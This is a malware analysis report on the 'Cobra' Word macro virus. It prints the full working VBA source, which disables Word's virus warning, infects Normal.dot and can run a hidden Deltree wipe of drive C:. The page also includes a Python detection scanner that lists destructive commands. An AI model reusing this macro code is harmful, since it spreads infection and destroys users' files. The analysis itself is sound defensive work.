Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aadfe6a2bc2e97a4…

MALICIOUS

Office (OLE)

Size: 48.0 KB
Created: 2000-04-12 23:43:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 8009374f839fa514a97b96ecb45dba45
SHA-1: 3a5f9bf85e3d40be2cc61d20459a85f3670b13f7
SHA-256: aadfe6a2bc2e97a499c6f30e1a0543f9ed3a0c9cdccaf1a265edbae3bd7120d9
Risk score: 340

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The recovered VBA project carries a module named 'Cobra' (version string 'Cobra Version 1.0C') whose entry points are the Word auto-macros AutoOpen and AutoClose (the Auto_Close heuristic matches the latter) together with FileNew and FileExit; a macro with the name of a built-in Word command intercepts that command, so the infection routine also runs whenever the user chooses File > New or File > Exit. AutoOpen first sets Options.VirusProtection, Options.SaveNormalPrompt and Options.ConfirmConversions to False, which silences Word's macro-virus warning and the prompt to save changes to Normal.dot. DelMac then calls Application.OrganizerDelete to remove every other module from the Normal template and from the active document, and TempCopy and ADocCopy call Application.OrganizerCopy to copy 'Cobra' into Normal.dot (saving it immediately) and from there back into the active document, which AutoClose saves on exit. That is the propagation loop of a classic Normal-template macro virus: once Normal.dot is infected, every document opened or created afterwards receives the module and carries it onward.

The remaining procedures are a date- and user-gated destructive payload. DelCDrive arms it only when the day of the month equals the month number (1 January through 10 October) and the first character of Application.UserName falls in a character-code range tied to that date; DelDir then scans the root of C: and, if any directory there starts with the same letter as the user name, runs Shell "Deltree /y c:\*.*" with the window hidden. This matches the ClamAV names on both the container (Doc.Trojan.Cobra-7) and the extracted source (Win.Trojan.DelTree-10). Two caveats on the automated labels: the persistence here is template infection, which ATT&CK T1137.001 (Office Template Macros) describes better than T1547.001, since nothing in the source touches the registry or the Startup folder; and the description attached to OLE_LEGACY_WORDBASIC_AUTOEXEC ('no modern VBA project was recovered') is generic rule text that does not apply to this sample, where the full VBA project was extracted and is shown below.
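As an added example (written for this page, not part of the analyzer's output and not olevba's code), the following Python script shows the source-level triage that produces heuristics like the ones listed below: it joins VBA line continuations so multi-line statements are matched whole, skips comment lines, and scans for auto-macro entry points, built-in command overrides, Normal-template infection via OrganizerCopy, macro-security tampering, Shell calls and destructive command strings, reporting the physical line of each hit. The rule names, severities, the ATT&CK references in the table and the functions scan_vba and verdict are this example's own choices; SAMPLE_VBA is a constructed excerpt modelled on the extracted macros.bas, not the full artifact.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt modelled on the extracted macros.bas; it is not the full
# artifact and its hash will not match the one in the report.
SAMPLE_VBA = r'''Attribute VB_Name = "Cobra"
'Cobra Version 1.0C
Sub AutoOpen()
    Options.VirusProtection = False
    Call DelMac
    Call TempCopy
End Sub
Sub DelMac()
    Application.OrganizerDelete Source:=NormalTemplate.FullName, _
        Name:=nm, Object:=wdOrganizerObjectProjectItems
End Sub
Private Sub TempCopy()
    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
    Destination:=NormalTemplate.FullName, Name:="Cobra", _
    Object:=wdOrganizerObjectProjectItems
    Templates(NormalTemplate.FullName).Save
End Sub
Sub AutoClose()
    TempCopy
End Sub
Sub DelDir()
    Shell "Deltree /y c:\*.*", vbHide
End Sub
Sub FileExit()
    Call DelMac
End Sub
'''

# Rule name -> (pattern, severity, ATT&CK reference). Names and severities are
# this example's own, not olevba's; patterns run against joined logical lines.
RULES = {
    # Word auto-macros and document events: entry points that need no user click.
    "autoexec": (re.compile(r"^(?:private\s+|public\s+)?sub\s+(?:auto_?(?:open|close|exec|new|exit)|document_(?:open|close|new))\s*\(", re.I), "high", "T1059.005"),
    # A macro named after a built-in Word command intercepts that command.
    "builtin_override": (re.compile(r"^(?:private\s+|public\s+)?sub\s+file(?:new|open|save|saveas|exit|close|print)\s*\(", re.I), "medium", "T1059.005"),
    # Copying a project item into Normal.dot: template infection / persistence.
    "template_infection": (re.compile(r"\borganizercopy\b.*\bnormaltemplate\b", re.I), "critical", "T1137.001"),
    # Deleting other modules from the template or document.
    "macro_cleanup": (re.compile(r"\borganizerdelete\b", re.I), "medium", "T1137.001"),
    # Silencing Word's macro-virus warning.
    "security_tamper": (re.compile(r"\boptions\.virusprotection\s*=\s*false\b", re.I), "critical", "T1562.001"),
    # Shell "..." / Shell(...) / WScript.Shell execution.
    "shell_call": (re.compile(r'\bshell\s*[("]', re.I), "critical", "T1059"),
    # Destructive command lines inside string literals (Format( the VBA function is excluded).
    "destructive_cmd": (re.compile(r"\b(?:deltree\s|format\s+[a-z]:|rd\s+/s|rmdir\s+/s|del\s+/[sq])", re.I), "critical", "T1485"),
}


def logical_lines(source: str) -> List[Tuple[int, str]]:
    """Join VBA continuation lines (trailing ' _') into one statement.
    Returns (physical line number of the first fragment, joined text)."""
    out, buf, start = [], [], 0
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if not buf:
            start = no
        if line.endswith(" _"):
            buf.append(line[:-2].strip())
            continue
        buf.append(line)
        out.append((start, " ".join(buf)))
        buf = []
    if buf:  # continuation at end of file: emit what we have
        out.append((start, " ".join(buf)))
    return out


def scan_vba(source: str) -> List[Dict[str, object]]:
    """Return one finding per (rule, statement) hit, with the statement's first line."""
    findings = []
    for no, text in logical_lines(source):
        low = text.lower()
        if low.startswith("'") or low.startswith("rem "):
            continue  # comment line
        for name, (pattern, severity, technique) in RULES.items():
            if pattern.search(text):
                findings.append({"rule": name, "severity": severity,
                                 "attack": technique, "line": no, "text": text})
    return findings


def verdict(findings: List[Dict[str, object]]) -> str:
    """Malicious only when an automatic entry point is paired with a critical indicator."""
    rules = {f["rule"] for f in findings}
    has_entry = bool(rules & {"autoexec", "builtin_override"})
    has_critical = any(f["severity"] == "critical" for f in findings)
    if has_entry and has_critical:
        return "malicious"
    return "suspicious" if findings else "clean"


if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    for h in hits:
        print(f"line {h['line']:>3} {h['severity']:<8} {h['rule']:<20} {h['attack']:<10} {h['text']}")
    print("verdict:", verdict(hits))
```

The continuation handling is the part worth keeping: the OrganizerCopy statement in this sample spans three physical lines, and a line-by-line grep for "OrganizerCopy" together with "NormalTemplate" misses it.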

Heuristics 7

  • ClamAV: Doc.Trojan.Cobra-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cobra-7
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11074 bytes
SHA-256: a750c52ed204900c640035e65cb4c3aec1945ce259fca38eed0ae0d4f99998e9
Detection
ClamAV: Win.Trojan.DelTree-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Cobra"
'Cobra Version 1.0C
Sub AutoOpen()
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Call DelMac
    Call TempCopy
    Call ADocCopy
    Call DelCDrive
End Sub
Sub DelMac()
On Error Resume Next
Set NTmp = NormalTemplate
    Set ADoc = ActiveDocument
    For i = 1 To NTmp.VBProject.VBComponents.Count
      nm = NTmp.VBProject.VBComponents(i).Name
      If (nm <> "Cobra") And (nm <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NTmp.FullName, _
            Name:=nm, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
    For i = 1 To ADoc.VBProject.VBComponents.Count
        nm = ADoc.VBProject.VBComponents(i).Name
        If (nm <> "ThisDocument") And (nm <> "Cobra") And _
        (nm <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=ADoc.FullName, _
        Name:=nm, Object:=wdOrganizerObjectProjectItems
    End If
    Next i
End Sub
Private Sub TempCopy()
On Error Resume Next
    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
    Destination:=NormalTemplate.FullName, Name:="Cobra", _
    Object:=wdOrganizerObjectProjectItems
    Templates(NormalTemplate.FullName).Save
End Sub
Private Sub ADocCopy()
On Error Resume Next
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
    Destination:=ActiveDocument.FullName, Name:="Cobra", _
    Object:=wdOrganizerObjectProjectItems
End Sub
Private Sub DelCDrive()
On Error Resume Next
    Dim DelOk As Boolean
For i = 1 To 10
If Day(Now) = i And Month(Now) = i Then
        If i <= 4 Then
            If Left(Application.UserName, 1) <= Chr(100) Then
            DelOk = True
            End If
        End If
    If i > 4 And i <= 8 Then
        If Left(Application.UserName, 1) > Chr(100) _
        And Left(Application.UserName, 1) <= Chr(200) Then
        DelOk = True
        End If
    End If
    If i > 8 And i <= 12 Then
        If Left(Application.UserName, 1) > Chr(200) _
        And Left(Application.UserName, 1) <= Chr(255) Then
        DelOk = True
        End If
    End If
End If
Next
    If DelOk = True Then
        Call DelDir
    End If
End Sub
Sub AutoClose()
On Error Resume Next
    TempCopy
    ADocCopy
    If ActiveDocument.Saved = False Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    End If
    End Sub
Sub DelDir()
On Error Resume Next
    Dim MP, MN
    MP = "c:\"
    MN = Dir(MP, vbDirectory)
    Do While MN <> ""
        If MN <> "." And MN <> ".." Then
            If (GetAttr(MP & MN) And vbDirectory) = vbDirectory Then
                If UCase(Left(MN, 1)) = UCase(Left(Application.UserName, 1)) Then
                    Shell "Deltree /y c:\*.*", vbHide
                End If
            End If
        End If
            MN = Dir
    Loop
End Sub
Sub FileNew()
On Error Resume Next
    Call DelMac
    Call TempCopy
    Call ADocCopy
    Dialogs(wdDialogFileNew).Show
End Sub
Sub FileExit()
On Error Resume Next
    Call DelMac
    Call TempCopy
    Call ADocCopy
End Sub

' Processing file: /opt/analyzer/scan_staging/70065fb4e9984ec19c896a70cd677890.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/Cobra - 8273 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0012 "Cobra Version 1.0C"
' Line #1:
' 	FuncDefn (Sub AutoOpen())
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #5:
' 	ArgsCall (Call) DelMac 0x0000 
' Line #6:
' 	
... (truncated)
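As an added example (written for this page, not part of the analyzer's output), the following Python model re-implements the DelCDrive and DelDir trigger logic from the extracted source so an analyst can enumerate which date and user-name combinations would have launched the Deltree payload without executing the macro. It follows the VBA as written: the date gate passes only when Day(Now) = Month(Now) for i = 1..10, the user-name gate compares the first character of Application.UserName with Chr(100), Chr(200) and Chr(255) in character-code order as VBA's default Option Compare Binary does, and DelDir requires a directory in the root of C: whose first letter matches the user name's case-insensitively. The function names (user_gate_open, deltree_would_run, trigger_dates) are this example's own, ROOT_DIRS is a constructed directory listing, and the model assumes code page 1252, under which Chr(200) and Chr(255) have code points 200 and 255.

```python
from datetime import date
from typing import Iterable, List, Union

DateLike = Union[date, str]

# Constructed listing of the root of C: on a hypothetical target; not from the sample.
ROOT_DIRS = ["Program Files", "Windows", "My Documents", "Temp"]


def _as_date(when: DateLike) -> date:
    return when if isinstance(when, date) else date.fromisoformat(when)


def _first_code(username: str) -> int:
    # Left("", 1) is "" and sorts before every non-empty string in a binary
    # comparison, so -1 keeps an empty user name in the first bucket like the VBA.
    # Assumption: cp1252, so the code point of a Latin-1 character equals its Chr() value.
    return ord(username[0]) if username else -1


def date_gate_open(when: DateLike) -> bool:
    """Day(Now) = i And Month(Now) = i for some i in 1..10: 1 Jan, 2 Feb, ..., 10 Oct."""
    d = _as_date(when)
    return d.day == d.month and 1 <= d.month <= 10


def user_gate_open(when: DateLike, username: str) -> bool:
    """The DelOk = True branch of DelCDrive for this date and Application.UserName."""
    if not date_gate_open(when):
        return False
    i = _as_date(when).month
    c = _first_code(username)
    if i <= 4:
        return c <= 100            # "A".."Z" and "a".."d"
    if i <= 8:
        return 100 < c <= 200      # "e".."z" and the first Latin-1 extras
    return 200 < c <= 255          # i = 9 or 10; the VBA's "<= 12" bound is never reached


def deltree_would_run(when: DateLike, username: str, c_root_dirs: Iterable[str]) -> bool:
    """DelDir: fires if a directory in C:\\ starts with the user name's letter (case-insensitive)."""
    if not user_gate_open(when, username):
        return False
    initial = username[:1].upper()
    return any(d[:1].upper() == initial
               for d in c_root_dirs if d and d not in (".", ".."))


def trigger_dates(username: str, c_root_dirs: Iterable[str], year: int) -> List[str]:
    """All dates (ISO strings) in `year` on which this user on this machine would lose C:\\."""
    dirs = list(c_root_dirs)
    return [d.isoformat()
            for d in (date(year, i, i) for i in range(1, 11))
            if deltree_would_run(d, username, dirs)]


if __name__ == "__main__":
    for user in ("Administrator", "Walter", "peter", "john"):
        print(f"{user:<14} {trigger_dates(user, ROOT_DIRS, 2000)}")
```

The split by character code explains why the payload is rarer than it looks: names starting with an upper-case letter only qualify from January to April, lower-case names from May to August, and only names starting with an accented Latin-1 letter above Chr(200) qualify on 9 September and 10 October; in every case a root directory with a matching initial is still required.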